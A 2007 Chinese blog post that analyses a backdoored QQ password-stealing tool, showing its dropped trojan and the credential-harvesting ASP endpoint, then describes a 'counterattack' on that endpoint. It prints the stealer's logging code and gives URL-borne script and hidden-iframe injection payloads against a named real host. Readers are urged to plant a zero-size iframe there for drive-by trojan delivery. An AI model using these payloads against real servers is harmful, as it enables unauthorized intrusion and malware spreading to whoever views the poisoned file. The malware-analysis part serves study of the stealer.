QQ盜號軟件後門分析與反擊

QQ盜號軟件後門分析與反擊

---

2007-10-27 22:03:33

　標籤：QQ　盜號軟件　後門　　　 [推送到技術圈]

來源：fhod's Blog
作者：fhod 小財
說明：文章已發表於***手冊07年10期，轉載請註明出處！

對明小子QQ密碼特工軟件的分析 ----小財

今天無聊給一朋友講解QQ盜取原理，從網上找了一個工具 “明小子QQ密碼特工”結果發現這個軟件有後門。下面就讓我帶着大家來分析一下。

首先我們用nod32來查一下有沒有毒。圖1


看到了吧沒有病毒。我們把監控打開在運行看看圖2


看到了吧 NOD32檢測到了病毒。爲了確認一下。我再用‘***輔助查找器’的文件監視功能來檢測下。

圖3


新建 C:\Documents and Settings\Administrator\Local Settings\Temp\IXP003.TMP\123.exe

很明顯軟件本身在運行的同時釋放了一個123.exe 而NOD32查殺到的也就是這個文件。

C:\Documents and Settings\Administrator\Local Settings\Temp\IXP003.TMP\

接着我們用peid查下123.exe. 圖4


EP段.nsp1經常搞免殺的應該知道這是北斗加的殼，我們再看看區段vmp 圖5


這個一看就是用vmprotect做的免殺。至於123.exe是什麼***咱門就不繼續分析了。

接下來分析他生成後的文件是不是一樣令人擔憂。

隨便配置一個圖6


Ollydbg手工給他脫殼esp定律簡單 圖7


脫殼成功後我們在用PEID檢測下 圖8


我們再用c32asm對他進行反彙編，搜索asp圖9


看到了什麼 .剛纔我是默認設置的應該是[url]http://langyeqq.cn/qq/newbacka.asp[/url]" href="http://k.thec.cn/xieming/69q/qq.asp纔對。，怎麼會是[url]http://langyeqq.cn/qq/newbacka.asp[/url]" target=_blank>[url]http://k.thec.cn/xieming/69q/qq.asp[/url]纔對。，怎麼會是[url]http://langyeqq.cn/qq/newbacka.asp[/url] 這個呢！我們瀏覽看看 圖10


"pzQQ"看到了吧，說明就是他的盜號的，從這些可以確定，這個軟件不但運行的時候施放一個***，而且就連我們配置好的文件也被他留了後門，而作者就坐等着收號了。

後門反擊戰 作者：fhod[E.S.T VIP]

看到這..想必大家也和我一樣非常氣憤..難道我們就任由作者下去嗎.當然不..現在我們就開始反擊.

我們來看看qq.asp的代碼
首先來看

strLogFile="Q7.txt"

這個是QQ接受文件..默認的是q7.txt

繼續看代碼

QQNumber=request("QQNumber")

QQPassWord=request("QQPassWord")

QQclub=request("QQclub")

QQip=request("QQip")

是沒經過任何過濾的..這些參數的數據我們完全可以自定義

在往下看

if QQNumber="" or QQPassWord="" then

response.write "pzQQ"

response.end

假如QQNumber和QQPassWord的值爲空就返回pzQQ .然後程序結束工作.. 只要這兩個值不爲空就繼續執行下面的代碼

StrLogText =StrLogText&QQNumber&"----"&QQPassWord&"----會員:"& QQclub&"----IP:"&QQip&"("&request.servervariables("REMOTE_HOST")

StrLogText=StrLogText&")"

寫入q7.txt文件

格式爲 QQ號碼----QQ密碼----會員:----IP:

繼續看下面的代碼

set f=Server.CreateObject("scripting.filesystemobject") (沒有q7.txt這個文件就自動新建)

set ff=f.opentextfile(server.mappath(".")&"\"&strLogFile,8,true,0)

ff.writeline(StrLogText) (打開q7.txt並寫入數據)

最後response.write "發送成功!" 滿足條件提示成功.

所有的代碼也就是這些..程序並未做任何過濾..和處理..也就是說..只要滿足qq.asp?QQNumber=123&QQPassWord=123 就回返回 "發送成功!"的提示.

[url]http://www.ciker.org/soft/qq.asp?QQNumber=123&QQPassWord=123[/url]

圖11


這就證明了QQNumber=123&QQPassWord=123這兩個我們是可以自己定義的..如果我們寫入的不是數字..而且一段腳本代碼呢?會不會執行呢..讓我們來試下
[url]http://www.ciker.org/soft/qq.asp?QQNumber=123&QQPassWord=[/url]< ... quot;fhod")</script>

圖12


插入代碼成功...我們來看下

[url]http://www.ciker.org/soft/q7.txt[/url]的源文件又是什麼樣的..

圖13


再次證明對提交的數據是無任何限制的...我們完全可以自己發揮想象.插入任何代碼都可以...

如果想反掛馬的話..我們就可以提交以下數據

[url]http://www.ciker.org/soft/qq.asp?QQNumber=123&QQPassWord=[/url]<iframe%20&# ... 20width=480%20height=480></iframe>

圖14


當然我這裏把width和height設置爲480只是爲了方便演示..實際掛馬中要改爲0

好了..現在我們就可以給作者一個驚喜去了..圖15

本文鏈接地址：[url]http://www.huaidan.org/blog/?id=1429[/url]

本文出自 51CTO.COM技術博客